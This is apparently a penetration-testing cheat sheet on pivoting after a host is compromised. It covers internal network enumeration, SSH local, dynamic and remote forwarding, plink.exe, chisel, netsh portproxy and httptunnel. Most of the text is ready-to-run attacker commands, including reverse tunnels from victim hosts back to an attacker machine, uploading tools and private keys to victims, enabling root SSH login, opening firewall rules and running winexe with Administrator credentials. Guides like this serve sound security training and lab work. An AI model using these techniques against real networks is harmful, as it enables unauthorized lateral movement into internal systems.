Pivoting(Tunneling and Port Forwarding)

Pivoting

Pivoting is the art of using access obtained over one machine to exploit another machine or sets of machines deeper in the network which may not be accessible from outside.

Types of Pivoting

There are generally two types of pivoting they are Tunneling and Port Forwarding

• Tunneling

• Port Forwarding

Tunneling or Proxying

What's a proxy? A proxy is simply an intermediatery server or system which sits in between the user and the resource which the user is trying to access. For example if i simply want to visit facebook.com using a proxy the proxy acts as a middleman it first receives the request to visit facebook.com from me(the user) and retrives the page for facebook.com for me and sends it back to our computer. So for example we have compromised a host 10.10.10.129, this host can talk to another host on the internal network which is on a different subnet 10.10.11.220 and is only accessible from internal network, what we can do it we can use our compromised host 10.10.10.129 host as a proxy server to route all desired traffic into 10.10.11.220. (A proxy is good if we want to redirect lots of different kinds of traffic into our target network -- or to access multiple ports on multiple different machines which our compromised host can talk to, however it may take alot of time)

Port Forwarding

This is technique where after compromising a host we create a connection between our local port and a single port of target which we want to access with the help of that compromised host.This is fast and reliable and usually is a chosen method of pivoting by an attacker.

Tools for Tunneling and Port Forwarding

• SSH port forwarding and tunnelling (primarily Unix)

• plink.exe (Windows)

• socat (Windows and Unix)

• chisel (Windows and Unix)

• sshuttle (currently Unix only)

• Uploading static nmap binary to scan the internal network

Enumerating a network for pivoting

The first and initial step of pivoting to another host after compromising one host is to enumerate which hosts our compromised hosts is allowed to access or talk to. After we have identified a host using any of the steps below we can simply ping that host from our compromised host and see if it is up or not.

Step 1

The first step of enumeration is to always check ipconfig /all in windows and ifconfig -a in linux to see if our target host is physically or by some other means is connected to or with other hosts in the network, if it is we will see another ipaddress with different last bit for example if we have compromised a host 10.10.10.11 and we do ipconfig /all and see ip address 10.10.10.20 we can know that this machine is connected to 10.10.10.20 machine and we can now pivot into that machine.

Step 2

We can use arp -a command in both linux and windows which will show any IP addresses of hosts that our compromised host has interacted with recently.

Step 3

We can also check the /etc/hosts file in linux and C:\Windows\System32\drivers\etc\hosts file in windows to check for any other ip address other than our own.

Step 4

A simple bash one liner can also be used to enumerate any other hosts on the network with whom our compromised host can talk to suppose we have compromised 10.10.10.12 host now we can use below bash one liner to find other hosts on the network with whom 10.10.10.12 is allowed to talk to.

for i in {1..255}; do (ping -c 1 10.10.10.${i} | grep "bytes from" &); done

Static nmap binary

After getting access on a host eg: 10.11.17.233 we can upload static nmap binary from https://github.com/andrew-d/static-binaries and scan for other hosts in the 17 subnet.

root@compromised-host:/dev/shm  ./nmap -v 10.11.17.0/24 --open

SSH Tunneling and Port Forwarding

If we have ssh access to target host suppose 10.10.11.12 and after doing netstat -ano or ss -lntp we find a weird looking port 8080 running web service which is listening internally on that target host itself so if we want to forward this 8080 port to our local machine we can simply do the following.

ssh -L 8080:127.0.0.1:8080 user@10.10.11.12 -fN 

After this we can simply navigate to http://127.0.0.1:8080 on browser on our local machine

• Suppose we had ssh access on 10.10.10.12 and we identified that our compromised host can talk to 10.10.10.20 on the internal network, after performing an nmap scan from our compromised host on 10.10.10.20 we identified that it is running a web service on port 8000 if we want to forward this port to our attacking machine then we can do the following.

ssh -L 8000:10.10.10.20:8000 user@10.10.10.11 -fN

After this we can navigate to http://127.0.0.1:8000 on our own local machine and access that website

SSH Dynamic Port Forwarding

In the above examples we were only limited to forwarding a single port of a single host in the internal network. This technique allows us to setup a local listening port on attacker's server and when a request in made through this port(using proxychains) the connection is first forwarded to compromised machine then to specific internal host within the compromised machine. For example: Suppose we have ssh access over 10.10.11.129 and after doing ifconfig -a we identify additional network interface 192.168.1.X which seems to be connected to different network, After doing bash oneliner ping on 255 hosts of 192.168.1 network we identified two hosts 192.168.1.110 and 192.168.1.220,Now if we wanted to forward every single port on our local machine for every identified host on 192 network it would be almost impossible or very time consuming so in such cases we use SSH dynamic port forwarding.

• First we setup a local listening port 8080 which will forward any request to 10.10.11.129 and then to our specified host on the internal 192 network.

sudo ssh -N -D 127.0.0.1:8080 user@10.10.11.129

• Configure proxychains, then we setup SOCKS proxy in our /etc/proxychains.conf file like below.

kali@kali:~$ cat /etc/proxychains.conf
...
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks4
127.0.0.1 8080

• Now suppose we identified 192.168.1.110 and 192.168.1.220 hosts on the internal network we can interact with these hosts from our own attacker box as below. The nmap, smbclient or ftp traffic will first go through the 10.10.11.129 network then to 192.168.1.110 and 192.168.1.220 on the internal network.

sudo proxychains nmap -sC -sV -sT -Pn 192.168.1.110

sudo proxychains smbclient -L //192.168.1.220

sudo proxychains ftp 192.168.1.110 21

Remote Port Forwarding(When we donot have ssh access on target but have a shell)

SSH Remote Port Forwarding

• Step 1 (On attacker machine)

ssh-keygen

• Step 2 (On attacker machine) Now copy the content of id_rsa.pub and paste into our own authorized keys file with

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty

this line at the start

Now our authorized_keys file should look something like this

command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDNSaC7L5Us/5m02xF6sSUUSswY6okS6Ke86tN+sC+f8fRg9ZzrvE8Md3zmObkaq8g9vVO9ZVeQ9sEyFDIfkC+pqIvV+L9T1p1TJ86hgRVldCtiwBRVybt5WR7UwHK4Y8j5hC00TZpqPw+B5ZtG4Auz2VQJuu6/3oKIVej80duc6jKIIrCztC+0CPyNAuN5sPF2Wnts3zjCIw9HW6mg7P+nXNXgevf736fGJWSB4okGEzhTwNJ1vfPuuMnBeyk5LnTILSfp8tMgoZl7VNJooFHmUNFzAdG0ozVc1P5PNciWofIerDf6lTeyU5mc5fCYv2kxq7RGslFgA9HKw668jNGbMxxS9bVM/fP/Bu6RlWiRkPA6JY0CJ88dN73SNFYjhCZfrZ/US0Gg9/04uUfbavYeQLauABM7uGrKtmcs3UEBh4J7XCYlyx0Mb6bk7sdnEpDVYQZ77/0K377CQUd6gnLTNgnuPRihtLaNcfPRGX4CbkFF+LpPM3t8p9c+xmr0EbE= lex@parrot

• Step 3 (On attacker machine) Start the ssh server if not started

sudo systemctl start ssh

• Step 4 (On victim machine) Now transfer our private key to the victim host where we have a stable shell. So if we have a stable shell on victim host 10.10.10.112 and this host is internally connected to 10.10.11.120 which is running web service on port 80

ssh -R 80:10.10.11.120:80 lex@<attacker-ip> -i id_rsa -fN

This will open port 80 on our attacker box and create a link between our(attacker's) port 80 and victim host 10.10.11.120:80 through 10.10.10.112(host where we have stable shell access)

plink.exe(Windows)

Same case as above if we have a stable shell on a victim host but donot have ssh access we can use statically compiled tools to achieve port forwarding plink in this case.

plink.exe - Case1(Forwarding local port of victim machine of same host to our machine)

Suppose 10.10.10.11 is our attacker ip address and we need to forward port 3306 of victim host to our attacker box now first we need to transfer plink.exe static binary to victim host we also need to configure ssh server on our attacking box and launch plink.exe as follows in the victim machine.

cmd.exe /c echo y | .\plink.exe -ssh -l <username> -pw <password> -R 10.10.10.11:3306:127.0.0.1:3306 10.10.10.11

plink.exe - Case2(Forwarding port of internal network's host connected with our compromised host to our attacking machine)

Suppose we have compromised a host 10.10.11.229 and this host is connected to another host 10.10.11.230 which is running a web server on port 8000, Here our attacking host's ip is 192.168.55.229. After uploading the plink.exe binary to our compromised host 10.10.11.229. Here we need to first run ssh server on our attacking machine 192.168.55.229.

• Step 1(Generate ssh key in our attacking machine) doing ssh-keygen

• Step 2 (Install puttygen tools in our attacking machine) sudo apt install putty-tools

• Step 3 (Convert id_rsa keyfile doing) puttygen id_rsa -o id_rsa.ppk

• Step 4(chmod 600 this id_rsa.ppk file and send to victim host)

Now on victim host do the following

cmd.exe /c echo y | .\plink.exe -R 8000:10.10.11.230:8000 username@192.168.55.229 -i id_rsa.ppk -N

Plink.exe (Another Method):

• we use plink.exe in windows to forward port of victim machine which is listening internally to same/another port of our attacker machine.

in attacker pc: edit the ssh configuration from /etc/ssh/sshd_config and uncomment the PermitRootLogin line and set its value to yes and restart the ssh servive. in victim pc:

plink.exe -l root -pw toor -R 445:127.0.0.1:445 10.10.15.133

• -l represents local username of our kali -pw represents root password of our kali and we are forwarding port 445 of victim machine to port 445 of our machine which lives on 10.10.15.133 via ssh

• we may have to press enter key couple of times in order to work.

• we use winexe to execute commands on windows via linux suppose we forwarded port 445 of victim machine and we have credentials of smb so on our linux we do

winexe -U 'Administrator%Password1!' //192.168.1.225 "cmd.exe"

Chisel(Linux and Windows)

Here we must have an appropriate copy of chisel binary on both attacking and victim hosts. On attacking host: ./chisel server -p 8000 --reverse On victim Host:

• Connect to 8000 on attacker's server open port 80 on attackers server and forward port 80 of victim(this) machine to port 80 of attacker's server

chisel client <attacker-ip>:8000 R:80:127.0.0.1:80

• Connect to 8000 on attacker's server open port 4444 on attackers server and forward port 80 of internal host 10.10.10.240 to 4444 of attacker's server

chisel client <attacker-ip>:8000 R:4444:10.10.10.240:80

• Connect to 8000 on attacker's server open port 80 on attackers and Create SOCKS5 listener on 1080 of attacker's server

chisel client <attacker-ip>:8000 R:socks 

ligolo-ng

-> All in one pivoting, tunneling and lateral movement tool for linux and windows: https://github.com/nicocha30/ligolo-ng

Forwarding port 80 of internal Windows host from compromised Windows machine(Compromised windows=10.10.11.1, internal windows=192.168.55.1)

netsh interface portproxy add v4tov4 listenport=8080(Can be any port) listenaddress=10.10.11.1(Compromised Host) connectport=80 connectaddress=192.168.55.1(Internal Host)

netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=10.10.11.1(Compromised Host) localport=8080 action=allow

From attacker's server

nc -nvv 10.10.11.1 8080(Will be forwarded to internal windows host 192.168.55.1's port 80 through 10.10.11.1)

Accessing internal windows host through compromised windows host via smb/cifs

net use \\dc.internal.local\C$ /user:internal\<username> <pass>

Forwarding port 3389(any) of internal windows host from compromised linux host(through http shell) where only port 80,443 and 1234(any) is allowed, Remote ssh login is not allowed but we have ssh creds to attacker's host so that any traffic sent to a certain port on attacker's host is forwarded to internal window's host in port 3389

In attacker's host

sudo apt install httptunnel

In compromised linux host

ssh -L 0.0.0.0:8888:<internal-windows-host-ip>:3389 username@127.0.0.1

In compromised linux host

hts --forward-port localhost:8888 1234 In attacker's host: htc --forward-port 8080 <ip-of-compromised-linux-host>:1234 

In attacker's host

rdesktop 127.0.0.1:8080